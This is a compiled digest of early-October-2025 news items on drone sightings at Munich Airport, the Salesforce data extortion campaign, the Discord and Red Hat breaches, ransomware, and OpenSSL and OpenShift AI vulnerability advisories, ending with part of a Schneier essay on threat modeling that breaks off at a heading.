Russian President Vladimir Putin joked Thursday that he would not fly drones over Denmark anymore, though Moscow has denied responsibility for the incidents. Denmark has stopped short of saying definitively who is responsible, but Western officials point to a pattern of Russian drone violations of NATO airspace in Poland, Romania, and Estonia.

The Misidentification Problem: Lessons from New Jersey
While European officials investigate potential hybrid warfare, the incidents raise uncomfortable parallels to the New Jersey drone panic of late 2024—a mass sighting event that turned out to be largely misidentification of routine aircraft and celestial objects.

Between November and December 2024, thousands of “drone” reports flooded in from New Jersey and neighboring states. The phenomenon sparked widespread fear, congressional hearings, and even forced then-President-elect Donald Trump to cancel a trip to his Bedminster golf club.

Federal investigations later revealed the reality: most sightings were manned aircraft operating lawfully. A joint FBI and DHS statement in December noted: “Historically, we have experienced cases of mistaken identity, where reported drones are, in fact, manned aircraft or facilities.”

TSA documents released months later showed that one of the earliest incidents—which forced a medical helicopter carrying a crash victim to divert—involved three commercial aircraft approaching nearby Solberg Airport. “The alignment of the aircraft gave the appearance to observers on the ground of them hovering in formation while they were actually moving directly at the observers,” the analysis found.

Dr. Will Austin, president of Warren County Community College and a national drone expert, reviewed numerous videos during the panic. He found that “many of the reports received involve misidentification of manned aircraft.” Even Jupiter, which was particularly bright in New Jersey’s night sky that season, was mistaken for a hovering drone.

The panic had real consequences: laser-pointing incidents at aircraft spiked to 59 in December 2024—more than the 49 incidents recorded for all of 2023, according to the FAA.

Munich Already on Edge
Munich was already placed on edge this week when its popular Oktoberfest was temporarily closed due to a bomb threat, and explosives were discovered in a residential building in the city’s north.

Whether Thursday’s drone sightings represent genuine security threats similar to the suspected Russian operations in Scandinavia, or misidentified routine aircraft like in New Jersey, remains under investigation. German authorities have not released details about what was observed or where the objects may have originated.

DroneXL’s Take
We’re watching two very different scenarios collide in dangerous ways. The Denmark and Norway incidents appear to involve sophisticated actors—large drones, coordinated timing, professional operation over multiple airports and military installations. Danish intelligence has credible reasons to suspect state-sponsored hybrid warfare, particularly given documented Russian drone violations of NATO airspace in Poland and Romania.

But the New Jersey panic showed how quickly mass hysteria can spiral when people start looking up. Once the narrative took hold, every airplane on approach, every bright planet, every hobbyist quadcopter became a “mystery drone.” Federal investigators reviewed over 5,000 reports and found essentially nothing anomalous—yet 78% of Americans still believed the government was hiding something.

Munich sits uncomfortably between these realities. Is it part of the escalating pattern of suspected Russian hybrid attacks on European infrastructure? Or is it another case of observers misidentifying routine air traffic in an atmosphere of heightened anxiety?

The distinction matters enormously. Real threats require sophisticated counter-drone systems and potentially invoke NATO collective defense mechanisms. False alarms waste resources, create dangerous situations (like those laser-pointing incidents), and damage the credibility of legitimate security concerns.

Airport authorities worldwide need better drone detection technology that can definitively distinguish between aircraft types. Equally important: they need to be transparent about what they’re actually seeing, rather than leaving information vacuums that fill with speculation and fear.

Another drone sighting at Munich Airport
  • Munich Airport (www.munich-airport.com)
    04.10.2025 (update 5 p.m.)

Following drone sightings late on Thursday and Friday evening and further drone sightings early on Saturday morning, the start of flight operations on 4 October 2025 was delayed. Flight operations were gradually ramped up and stabilised over the course of the afternoon.

Following drone sightings late on Thursday and Friday evening and further drone sightings early on Saturday morning, the start of flight operations on 4 October 2025 has been delayed. Flight operations were gradually ramped up and stabilised over the course of the afternoon. Passengers were asked to check the status of their flight on their airline's website before travelling to the airport. Of the more than 1,000 take-offs and landings planned for Saturday, airlines cancelled around 170 flights during the day for operational reasons.

As on previous nights, Munich Airport worked with the airlines to immediately provide for passengers in the terminals. These activities will continue on Saturday evening and into Sunday night. Numerous camp beds will again be set up, and blankets, air mattresses, drinks and snacks will be distributed. In addition, some shops, restaurants and a pharmacy in the public area will extend their opening hours and remain open throughout the night. In addition to numerous employees of the airport, airlines and service providers, numerous volunteers are also on duty.

When a drone is suspected of being sighted, the safety of travellers is the top priority. Reporting chains between air traffic control, the airport and police authorities have been established for years. It is important to emphasise that the detection and defence against drones are sovereign tasks and are the responsibility of the federal and state police.

Press: Drone sightings at Munich Airport

Munich Airport (www.munich-airport.com)
October 3, 2025 (Update)

On Thursday evening (October 2), several drones were sighted in the vicinity of and on the grounds of Munich Airport. The first reports were received at around 8:30 p.m. Initially, areas around the airport, including Freising and Erding, were affected.

The state police immediately launched extensive search operations with a large number of officers in the vicinity of the airport. At the same time, the federal police immediately carried out surveillance and search operations on the airport grounds. However, it has not yet been possible to identify the perpetrator.

At around 9:05 p.m., drones were reported near the airport fence. At around 10:10 p.m., the first sighting was made on the airport grounds. As a result, flight operations were gradually suspended at 10:18 p.m. for safety reasons. The preventive closure affected both runways from 10:35 p.m. onwards. The sightings ended around midnight. According to the airport operator, there were 17 flight cancellations and 15 diversions by that time. Helicopters from the federal police and the Bavarian state police were also deployed to monitor the airspace and conduct searches.

Munich Airport, in cooperation with the airlines, immediately took care of the passengers in the terminals. Camp beds were set up, and blankets, drinks, and snacks were provided. In addition, 15 arriving flights were diverted to Stuttgart, Nuremberg, Vienna, and Frankfurt. Flight operations resumed as normal today (Friday, October 3).

Responsibilities and cooperation

Within the scope of their respective tasks, the German Air Traffic Control (DFS), the state aviation security authorities, the state police forces, and the federal police are responsible for the detection and defense against drones at commercial airports.

The measures are carried out in close coordination between all parties involved and the airport operator on the basis of jointly developed emergency plans. The local state police force is responsible for preventive policing in the vicinity of the airport, while the federal police is responsible for policing on the airport grounds. Criminal prosecution is the responsibility of the state police.

Note: Please understand that for tactical reasons, the security authorities are unable to provide any further information on the systems and measures used. Further investigations will be conducted by the Bavarian police, as they have jurisdiction in this matter.

Hacking group claims theft of 1 billion records from Salesforce customer databases | TechCrunch

techcrunch.com - Lorenzo Franceschi-Bicchierai
Zack Whittaker
6:17 AM PDT · October 3, 2025

The hacking group claims to have stolen about a billion records from companies, including FedEx, Qantas, and TransUnion, who store their customer and company data in Salesforce.

A notorious predominantly English-speaking hacking group has launched a website to extort its victims, threatening to release about a billion records stolen from companies who store their customers’ data in cloud databases hosted by Salesforce.

The loosely organized group, which has been known as Lapsus$, Scattered Spider, and ShinyHunters, has published a dedicated data leak site on the dark web, called Scattered LAPSUS$ Hunters.

The website, first spotted by threat intelligence researchers on Friday and seen by TechCrunch, aims to pressure victims into paying the hackers to avoid having their stolen data published online.

“Contact us to regain control on data governance and prevent public disclosure of your data,” reads the site. “Do not be the next headline. All communications demand strict verification and will be handled with discretion.”

Over the last few weeks, the ShinyHunters gang allegedly hacked dozens of high-profile companies by breaking into their cloud-based databases hosted by Salesforce.

Insurance giant Allianz Life, Google, fashion conglomerate Kering, the airline Qantas, carmaking giant Stellantis, credit bureau TransUnion, and the employee management platform Workday, among several others, have confirmed their data was stolen in these mass hacks.

The hackers’ leak site lists several alleged victims, including FedEx, Hulu (owned by Disney), and Toyota Motors, none of which responded to a request for comment on Friday.

It’s not clear if the companies known to have been hacked but not listed on the hacking group’s leak site have paid a ransom to the hackers to prevent their data from being published. When reached by TechCrunch, a representative from ShinyHunters said, “there are numerous other companies that have not been listed,” but declined to say why.

At the top of the site, the hackers mention Salesforce and demand that the company negotiate a ransom, threatening that otherwise “all your customers [sic] data will be leaked.” The tone of the message suggests that Salesforce has not yet engaged with the hackers.

Salesforce spokesperson Nicole Aranda provided a link to the company’s statement, which notes that the company is “aware of recent extortion attempts by threat actors.”

“Our findings indicate these attempts relate to past or unsubstantiated incidents, and we remain engaged with affected customers to provide support,” the statement reads. “At this time, there is no indication that the Salesforce platform has been compromised, nor is this activity related to any known vulnerability in our technology.”

Aranda declined to comment further.

For weeks, security researchers have speculated that the group, which has historically eschewed a public presence online, was planning to publish a data leak website to extort its victims.

Historically, such websites have been associated with foreign, often Russian-speaking, ransomware gangs. In the last few years, these organized cybercrime groups have evolved from stealing, encrypting their victim’s data, and then privately asking for a ransom, to simply threatening to publish the stolen data online unless they get paid.

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

securityaffairs.com
October 04, 2025
Pierluigi Paganini

GreyNoise saw a 500% spike in scans on Palo Alto Networks login portals on Oct. 3, 2025, the highest in three months.
Cybersecurity firm GreyNoise reported a 500% surge in scans targeting Palo Alto Networks login portals on October 3, 2025, marking the highest activity in three months.

On October 3, the researchers observed that over 1,285 IPs scanned Palo Alto portals, up from a usual 200. The experts reported that 93% of the IPs were suspicious, 7% malicious.
Most originated from the U.S., with smaller clusters in the U.K., Netherlands, Canada, and Russia.

GryNoise defined the traffic targeted and structured, aimed at Palo Alto login portals and split across distinct scanning clusters.

The scans targeted emulated Palo Alto profiles, focusing mainly on U.S. and Pakistan systems, indicating coordinated, targeted reconnaissance.

GreyNoise found that recent Palo Alto scanning mirrors Cisco ASA activity, showing regional clustering and shared TLS fingerprints linked to the Netherlands infrastructure. Both used similar tools, suggesting possible shared infrastructure or operators. The overlap follows a Cisco ASA scanning surge preceding the disclosure of two zero-day vulnerabilities.

“Both Cisco ASA and Palo Alto login scanning traffic in the past 48 hours share a dominant TLS fingerprint tied to infrastructure in the Netherlands. This comes after GreyNoise initially reported an ASA scanning surge before Cisco’s disclosure of two ASA zero-days.” reads the report published by Grey Noise. “In addition to a possible connection to ongoing Cisco ASA scanning, GreyNoise identified concurrent surges across remote access services. While suspicious, we are unsure if this activity is related. “

GreyNoise noted in July spikes in Palo Alto scans sometimes preceded new flaws within six weeks; The experts are monitoring if the latest surge signals another disclosure.
“GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats.” concludes the report.

Update on a Security Incident Involving Third-Party Customer Service

discord.com

Discord
October 3, 2025

At Discord, protecting the privacy and security of our users is a top priority. That’s why it’s important to us that we’re transparent with them about events that impact their personal information.

Discord recently discovered an incident where an unauthorized party compromised one of Discord’s third-party customer service providers.
This incident impacted a limited number of users who had communicated with our Customer Support or Trust & Safety teams.
This unauthorized party did not gain access to Discord directly.
No messages or activities were accessed beyond what users may have discussed with Customer Support or Trust & Safety agents.
We immediately revoked the customer support provider’s access to our ticketing system and continue to investigate this matter.
We’re working closely with law enforcement to investigate this matter.
We are in the process of emailing the users impacted.

At Discord, protecting the privacy and security of our users is a top priority. That’s why it’s important to us that we’re transparent with them about events that impact their personal information.

Recently, we discovered an incident where an unauthorized party compromised one of Discord’s third-party customer service providers. The unauthorized party then gained access to information from a limited number of users who had contacted Discord through our Customer Support and/or Trust & Safety teams.

As soon as we became aware of this attack, we took immediate steps to address the situation. This included revoking the customer support provider’s access to our ticketing system, launching an internal investigation, engaging a leading computer forensics firm to support our investigation and remediation efforts, and engaging law enforcement.

We are in the process of contacting impacted users. If you were impacted, you will receive an email from noreply@discord.com. We will not contact you about this incident via phone – official Discord communications channels are limited to emails from noreply@discord.com.

What happened?
An unauthorized party targeted our third-party customer support services to access user data, with a view to extort a financial ransom from Discord.

What data was involved?
The data that may have been impacted was related to our customer service system. This may include:

Name, Discord username, email and other contact details if provided to Discord customer support
Limited billing information such as payment type, the last four digits of your credit card, and purchase history if associated with your account
IP addresses
Messages with our customer service agents
Limited corporate data (training materials, internal presentations)
The unauthorized party also gained access to a small number of government‑ID images (e.g., driver’s license, passport) from users who had appealed an age determination. If your ID may have been accessed, that will be specified in the email you receive.

What data was not involved?
Full credit card numbers or CCV codes
Messages or activity on Discord beyond what users may have discussed with customer support
Passwords or authentication data
What are we doing about this?
Discord has and will continue to take all appropriate steps in response to this situation. As standard, we will continue to frequently audit our third-party systems to ensure they meet our security and privacy standards. In addition, we have:

Notified relevant data protection authorities.
Proactively engaged with law enforcement to investigate this attack.
Reviewed our threat detection systems and security controls for third-party support providers.
Taking next steps
Looking ahead, we recommend impacted users stay alert when receiving messages or other communication that may seem suspicious. We have service agents on hand to answer questions and provide additional support.

We take our responsibility to protect your personal data seriously and understand the inconvenience and concern this may cause.

'Delightful' Red Hat OpenShift AI bug allows full takeover

theregister.com • The Register
by Jessica Lyons
Wed 1 Oct 2025 // 19:35 UTC

: Who wouldn't want root access on cluster master nodes?

9.9 out of 10 severity bug in Red Hat's OpenShift AI service could allow a remote attacker with minimal authentication to steal data, disrupt services, and fully hijack the platform.

"A low-privileged attacker with access to an authenticated account, for example as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator," the IBM subsidiary warned in a security alert published earlier this week.

"This allows for the complete compromise of the cluster's confidentiality, integrity, and availability," the alert continues. "The attacker can steal sensitive data, disrupt all services, and take control of the underlying infrastructure, leading to a total breach of the platform and all applications hosted on it."

Red Hat deemed the vulnerability, tracked as CVE-2025-10725, "important" despite its 9.9 CVSS score, which garners a critical-severity rating from the National Vulnerability Database - and basically any other organization that issues CVEs. This, the vendor explained, is because the flaw requires some level of authentication, albeit minimal, for an attacker to jeopardize the hybrid cloud environment.

Users can mitigate the flaw by removing the ClusterRoleBinding that links the kueue-batch-user-role ClusterRole with the system:authenticated group. "The permission to create jobs should be granted on a more granular, as-needed basis to specific users or groups, adhering to the principle of least privilege," Red Hat added.

Additionally, the vendor suggests not granting broad permissions to system-level groups.

Red Hat didn't immediately respond to The Register's inquiries, including if the CVE has been exploited. We will update this story as soon as we receive any additional information.

Whose role is it anyway?
OpenShift AI is an open platform for building and managing AI applications across hybrid cloud environments.

As noted earlier, it includes a ClusterRole named "kueue-batch-user-role." The security issue here exists because this role is incorrectly bound to the system:authenticated group.

"This grants any authenticated entity, including low-privileged service accounts for user workbenches, the permission to create OpenShift Jobs in any namespace," according to a Bugzilla flaw-tracking report.
One of these low-privileged accounts could abuse this to schedule a malicious job in a privileged namespace, configure it to run with a high-privilege ServiceAccount, exfiltrate that ServiceAccount token, and then "progressively pivot and compromise more powerful accounts, ultimately achieving root access on cluster master nodes and leading to a full cluster takeover," the report said.

"Vulnerabilities offering a path for a low privileged user to fully take over an environment needs to be patched in the form of an incident response cycle, seeking to prove that the environment was not already compromised," Trey Ford, chief strategy and trust officer at crowdsourced security company Bugcrow said in an email to The Register.

In other words: "Assume breach," Ford added.

"The administrators managing OpenShift AI infrastructure need to patch this with a sense of urgency - this is a delightful vulnerability pattern for attackers looking to acquire both access and data," he said. "Security teams must move with a sense of purpose, both verifying that these environments have been patched, then investigating to confirm whether-and-if their clusters have been compromised."

Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less - Arctic Wolf

Since late July 2025, Arctic Wolf has observed an ongoing surge in Akira ransomware activity targeting SonicWall firewalls through malicious SSL VPN logins.

ShinyHunters launches Salesforce data leak site to extort 39 victims

bleepingcomputer.com By Sergiu Gatlan
October 3, 2025

An extortion group has launched a new data leak site to publicly extort dozens of companies impacted by a wave of Salesforce breaches, leaking samples of data stolen in the attacks.

The threat actors responsible for these attacks claim to be part of the ShinyHunters, Scattered Spider, and Lapsus$ groups, collectively referring to themselves as "Scattered Lapsus$ Hunters."

Today, they launched a new data leak site containing 39 companies impacted by the attacks. Each entry includes samples of data allegedly stolen from victims' Salesforce instances, and warns the victims to reach out to "prevent public disclosure" of their data before the October 10 deadline is reached.

The companies being extorted on the data leak site include well-known brands and organizations, including FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, Instacart, Cartier, Adidas, Sake Fifth Avenue, Air France & KLM, Transunion, HBO MAX, UPS, Chanel, and IKEA.

"All of them have been contacted long ago, they saw the email because I saw them download the samples multiple times. Most of them chose to not disclose and ignore," ShinyHunters told BleepingComputer.

"We highly advise you proceed into the right decision, your organisation can prevent the release of this data, regain control over the situation and all operations remain stable as always. We highly recommend a decision-maker to get involved as we are presenting a clear and mutually beneficial opportunity to resolve this matter," they warned on the leak site.

The threat actors also added a separate entry requesting that Salesforce pay a ransom to prevent all impacted customers' data (approximately 1 billion records containing personal information) from being leaked.

"Should you comply, we will withdraw from any active or pending negotiation indiviually from your customers. Your customers will not be attacked again nor will they face a ransom from us again, should you pay," they added.

The extortion group also threatened the company, stating that it would help law firms pursue civil and commercial lawsuits against Salesforce following the data breaches and warned that the company had also failed to protect customers' data as required by the European General Data Protection Regulation (GDPR).

Cybersécurité: une PME paralysée par une attaque ransomware

24heures.ch Marc Renfer
Publié le 03.10.2025 à 06h30

Comment une attaque informatique paralyse une PME romande

Visée par des pirates, l’entreprise Bugnard SA est à l’arrêt. Son directeur raconte l’enfer vécu depuis une semaine.
En bref:

* L’entreprise Bugnard SA subit une cyberattaque paralysante.
* Les serveurs cryptés empêchent la gestion des commandes.
* Le groupe Akira réclame une rançon en bitcoins.

La société n’est peut-être pas connue du grand public, mais les outils et appareils de mesure fournis par Bugnard SA ont sûrement servi à installer ou réparer une prise, un compteur ou une armoire électrique près de chez vous.

Très nombreux sont les installateurs à se fournir auprès de cette PME installée à Cheseaux-sur-Lausanne, avec des succursales à Genève et Zurich. Leader dans la vente de matériel pour électriciens, l’entreprise réalise 72% de ses affaires en ligne. Mais le 24 septembre en fin de journée, tout s’est brutalement arrêté.

«Vers 17 h 30, tous nos systèmes ont été bloqués. On a vite compris qu’on était sous cyberattaque. Depuis, nous sommes complètement à l’arrêt», témoigne Christian Degouy, CEO de Bugnard, qui a racheté l’entreprise en 2020 à la famille du fondateur.

Depuis l’offensive informatique, il vit «dans un tunnel». Dès le lendemain de l’attaque, l’équipe découvre un fichier contenant une demande de rançon: 450’000 dollars, à verser en bitcoins. Le groupe derrière l’attaque est identifié rapidement. Il s’agit d’Akira, une organisation bien connue des spécialistes de la cybersécurité.
Une signature russe derrière l’attaque

Apparu en mars 2023, Akira est un groupe structuré de type ransomware, dont les développeurs seraient basés en Russie ou dans d’anciennes républiques soviétiques. Ils louent leur outil de piratage à des affiliés qui ciblent surtout des PME d’Europe de l’Ouest et d’Amérique du Nord. La récente victime vaudoise figure désormais sur leur site hébergé dans le dark web, avec une description des données dérobées.

L’analyse technique est encore en cours, mais une hypothèse pointe une potentielle faille dans un pare-feu.

«On connaissait le risque de ces attaques», reconnaît Christian Degouy. «On avait même entamé des démarches pour une assurance cyber. Mais comme on était en plein déménagement de notre siège social, on a reporté le processus», soupire-t-il.
Paralysie totale

Les conséquences sont lourdes. L’ensemble des serveurs est encrypté, y compris les sauvegardes pensées justement pour faire face à une telle situation. Le site de vente est à l’arrêt. Plus de commandes, plus de logistique, pour une entreprise de 30 employés qui traite habituellement plus de 1000 commandes par semaine.

«Nos 4800 clients sont pour l’essentiel des électriciens, petits ou grands. Ils dépendent de nous pour travailler. Et nous, on est paralysés. On ne peut plus sortir un bulletin de livraison, ni savoir où se trouve un article dans notre stock, qui comporte plus de 9000 emplacements.»

Son entrepôt principal fait plus de 2500 m². Sans l’aide informatique, retrouver le matériel est parfois devenu impossible. «Quand un client a un besoin urgent d’un produit que l’on peut localiser, il passe et on note à la main. On est revenus au carnet de lait. »

Par chance, les e-mails sont toujours fonctionnels et permettent de conserver le lien. La seule activité encore maintenue est la calibration des instruments à Genève, qui dépend d’un autre système et n’est pas concernée par l’attaque.
Le dilemme du paiement

En coulisses, les négociations ont démarré. Un prestataire spécialisé garde le contact avec les cybercriminels. Akira a revu sa demande à la baisse: 250, puis 200’000 dollars. «Je ne veux pas payer. Mais si on n’a pas redémarré vendredi, je paierai dimanche soir», tranche le CEO. «C’est difficile à dire, mais ce groupe a une «réputation», il semble livrer la clé quand on paie. »

Une plainte pénale a été déposée. La cellule cybercriminalité du canton de Vaud, qui a indiqué à l’entreprise suivre une cinquantaine de cas similaires, est mobilisée.

Bugnard SA espère pouvoir relancer ses activités d’ici à la fin de la semaine. Le doute persiste: tout reconstruire prend du temps, et le risque de réinstaller un système contaminé doit être écarté.

«Le sentiment d’impuissance est insupportable. Ce que je souhaite, c’est que ça n’arrive à personne d’autre», conclut Christian Degouy. À l’attention des autres entrepreneurs, il formule trois conseils simples: activer la double authentification sur tous les accès, effectuer des sauvegardes déconnectées, et maintenir à jour ses logiciels.

Security update: Incident related to Red Hat Consulting GitLab instance

We are writing to provide an update regarding a security incident related to a specific GitLab environment used by our Red Hat Consulting team. Red Hat takes the security and integrity of our systems and the data entrusted to us extremely seriously, and we are addressing this issue with the highest priority.

What happened
We recently detected unauthorized access to a GitLab instance used for internal Red Hat Consulting collaboration in select engagements. Upon detection, we promptly launched a thorough investigation, removed the unauthorized party’s access, isolated the instance, and contacted the appropriate authorities. Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance.

We have now implemented additional hardening measures designed to help prevent further access and contain the issue.

Scope and impact on customers
We understand you may have questions about whether this incident affects you. Based on our investigation to date, we can share:

Impact on Red Hat products and supply chain: At this time, we have no reason to believe this security issue impacts any of our other Red Hat services or products, including our software supply chain or downloading Red Hat software from official channels.
Consulting customers: If you are a Red Hat Consulting customer, our analysis is ongoing. The compromised GitLab instance housed consulting engagement data, which may include, for example, Red Hat’s project specifications, example code snippets, and internal communications about consulting services. This GitLab instance typically does not house sensitive personal data. While our analysis remains ongoing, we have not identified sensitive personal data within the impacted data at this time. We will notify you directly if we believe you have been impacted.
Other customers: If you are not a Red Hat Consulting customer, there is currently no evidence that you have been affected by this incident.
For clarity, this incident is unrelated to a Red Hat OpenShift AI vulnerability (CVE-2025-10725) that was announced yesterday.

Our next steps
We are engaging directly with any customers who may be impacted.

Thank you for your continued trust in Red Hat. We appreciate your patience as we continue our investigation.

Out-of-bounds read & write in RFC 3211 KEK Unwrap (CVE-2025-9230)

OpenSSL Security Advisory [30th September 2025]
https://openssl-library.org/news/secadv/20250930.txt

===============================================

Out-of-bounds read & write in RFC 3211 KEK Unwrap (CVE-2025-9230)

=================================================================

Severity: Moderate

Issue summary: An application trying to decrypt CMS messages encrypted using
password based encryption can trigger an out-of-bounds read and write.

Impact summary: This out-of-bounds read may trigger a crash which leads to
Denial of Service for an application. The out-of-bounds write can cause
a memory corruption which can have various consequences including
a Denial of Service or Execution of attacker-supplied code.

Although the consequences of a successful exploit of this vulnerability
could be severe, the probability that the attacker would be able to
perform it is low. Besides, password based (PWRI) encryption support in CMS
messages is very rarely used. For that reason the issue was assessed as
Moderate severity according to our Security Policy.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as the CMS implementation is outside the OpenSSL FIPS module
boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zd.
(premium support customers only)

OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zm.
(premium support customers only)

This issue was reported on 9th August 2025 by Stanislav Fort (Aisle Research).
The fix was developed by Stanislav Fort (Aisle Research) and Viktor Dukhovni.

Timing side-channel in SM2 algorithm on 64 bit ARM (CVE-2025-9231)

=================================================================

Severity: Moderate

Issue summary: A timing side-channel which could potentially allow remote
recovery of the private key exists in the SM2 algorithm implementation on 64 bit
ARM platforms.

Impact summary: A timing side-channel in SM2 signature computations on 64 bit
ARM platforms could allow recovering the private key by an attacker.

While remote key recovery over a network was not attempted by the reporter,
timing measurements revealed a timing signal which may allow such an attack.

OpenSSL does not directly support certificates with SM2 keys in TLS, and so
this CVE is not relevant in most TLS contexts. However, given that it is
possible to add support for such certificates via a custom provider, coupled
with the fact that in such a custom provider context the private key may be
recoverable via remote timing measurements, we consider this to be a Moderate
severity issue.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as SM2 is not an approved algorithm.

OpenSSL 3.1, 3.0, 1.1.1 and 1.0.2 are not vulnerable to this issue.

OpenSSL 3.5, 3.4, 3.3, and 3.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

This issue was reported on 18th August 2025 by Stanislav Fort (Aisle Research)
The fix was developed by Stanislav Fort.

Out-of-bounds read in HTTP client no_proxy handling (CVE-2025-9232)

===================================================================

Severity: Low

Issue summary: An application using the OpenSSL HTTP client API functions may
trigger an out-of-bounds read if the "no_proxy" environment variable is set and
the host portion of the authority component of the HTTP URL is an IPv6 address.

Impact summary: An out-of-bounds read can trigger a crash which leads to
Denial of Service for an application.

The OpenSSL HTTP client API functions can be used directly by applications
but they are also used by the OCSP client functions and CMP (Certificate
Management Protocol) client implementation in OpenSSL. However the URLs used
by these implementations are unlikely to be controlled by an attacker.

In this vulnerable code the out of bounds read can only trigger a crash.
Furthermore the vulnerability requires an attacker-controlled URL to be
passed from an application to the OpenSSL function and the user has to have
a "no_proxy" environment variable set. For the aforementioned reasons the
issue was assessed as Low severity.

The vulnerable code was introduced in the following patch releases:
3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as the HTTP client implementation is outside the OpenSSL FIPS module
boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2 and 3.0 are vulnerable to this issue.

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

This issue was reported on 16th August 2025 by Stanislav Fort (Aisle Research).
The fix was developed by Stanislav Fort (Aisle Research).

General Advisory Notes

======================

URL for this Security Advisory:
https://openssl-library.org/news/secadv/20250930.txt

Feds Tie ‘Scattered Spider’ Duo to $115M in Ransoms

– Krebs on Security
U.S. prosecutors last week levied criminal hacking charges against 19-year-old U.K. national Thalha Jubair for allegedly being a core member of Scattered Spider, a prolific cybercrime group blamed for extorting at least $115 million in ransom payments from victims. The charges came as Jubair and an alleged co-conspirator appeared in a London court to face accusations of hacking into and extorting several large U.K. retailers, the London transit system, and healthcare providers in the United States.

At a court hearing last week, U.K. prosecutors laid out a litany of charges against Jubair and 18-year-old Owen Flowers, accusing the teens of involvement in an August 2024 cyberattack that crippled Transport for London, the entity responsible for the public transport network in the Greater London area.

Digital Threat Modeling Under Authoritarianism

Schneier on Security - schneier.com/blog/ - Posted on September 26, 2025 at 7:04 AM

Digital Threat Modeling Under Authoritarianism
Today’s world requires us to make complex and nuanced decisions about our digital security. Evaluating when to use a secure messaging app like Signal or WhatsApp, which passwords to store on your smartphone, or what to share on social media requires us to assess risks and make judgments accordingly. Arriving at any conclusion is an exercise in threat modeling.

In security, threat modeling is the process of determining what security measures make sense in your particular situation. It’s a way to think about potential risks, possible defenses, and the costs of both. It’s how experts avoid being distracted by irrelevant risks or overburdened by undue costs.

We threat model all the time. We might decide to walk down one street instead of another, or use an internet VPN when browsing dubious sites. Perhaps we understand the risks in detail, but more likely we are relying on intuition or some trusted authority. But in the U.S. and elsewhere, the average person’s threat model is changing—specifically involving how we protect our personal information. Previously, most concern centered on corporate surveillance; companies like Google and Facebook engaging in digital surveillance to maximize their profit. Increasingly, however, many people are worried about government surveillance and how the government could weaponize personal data.

Since the beginning of this year, the Trump administration’s actions in this area have raised alarm bells: The Department of Government Efficiency (DOGE) took data from federal agencies, Palantir combined disparate streams of government data into a single system, and Immigration and Customs Enforcement (ICE) used social media posts as a reason to deny someone entry into the U.S.

These threats, and others posed by a techno-authoritarian regime, are vastly different from those presented by a corporate monopolistic regime—and different yet again in a society where both are working together. Contending with these new threats requires a different approach to personal digital devices, cloud services, social media, and data in general.

What Data Does the Government Already Have?
For years, most public attention has centered on the risks of tech companies gathering behavioral data. This is an enormous amount of data, generally used to predict and influence consumers’ future behavior—rather than as a means of uncovering our past. Although commercial data is highly intimate—such as knowledge of your precise location over the course of a year, or the contents of every Facebook post you have ever created—it’s not the same thing as tax returns, police records, unemployment insurance applications, or medical history.

The U.S. government holds extensive data about everyone living inside its borders, some of it very sensitive—and there’s not much that can be done about it. This information consists largely of facts that people are legally obligated to tell the government. The IRS has a lot of very sensitive data about personal finances. The Treasury Department has data about any money received from the government. The Office of Personnel Management has an enormous amount of detailed information about government employees—including the very personal form required to get a security clearance. The Census Bureau possesses vast data about everyone living in the U.S., including, for example, a database of real estate ownership in the country. The Department of Defense and the Bureau of Veterans Affairs have data about present and former members of the military, the Department of Homeland Security has travel information, and various agencies possess health records. And so on.

It is safe to assume that the government has—or will soon have—access to all of this government data. This sounds like a tautology, but in the past, the U.S. government largely followed the many laws limiting how those databases were used, especially regarding how they were shared, combined, and correlated. Under the second Trump administration, this no longer seems to be the case.

Augmenting Government Data with Corporate Data
The mechanisms of corporate surveillance haven’t gone away. Compute technology is constantly spying on its users—and that data is being used to influence us. Companies like Google and Meta are vast surveillance machines, and they use that data to fuel advertising. A smartphone is a portable surveillance device, constantly recording things like location and communication. Cars, and many other Internet of Things devices, do the same. Credit card companies, health insurers, internet retailers, and social media sites all have detailed data about you—and there is a vast industry that buys and sells this intimate data.

This isn’t news. What’s different in a techno-authoritarian regime is that this data is also shared with the government, either as a paid service or as demanded by local law. Amazon shares Ring doorbell data with the police. Flock, a company that collects license plate data from cars around the country, shares data with the police as well. And just as Chinese corporations share user data with the government and companies like Verizon shared calling records with the National Security Agency (NSA) after the Sept. 11 terrorist attacks, an authoritarian government will use this data as well.

Personal Targeting Using Data
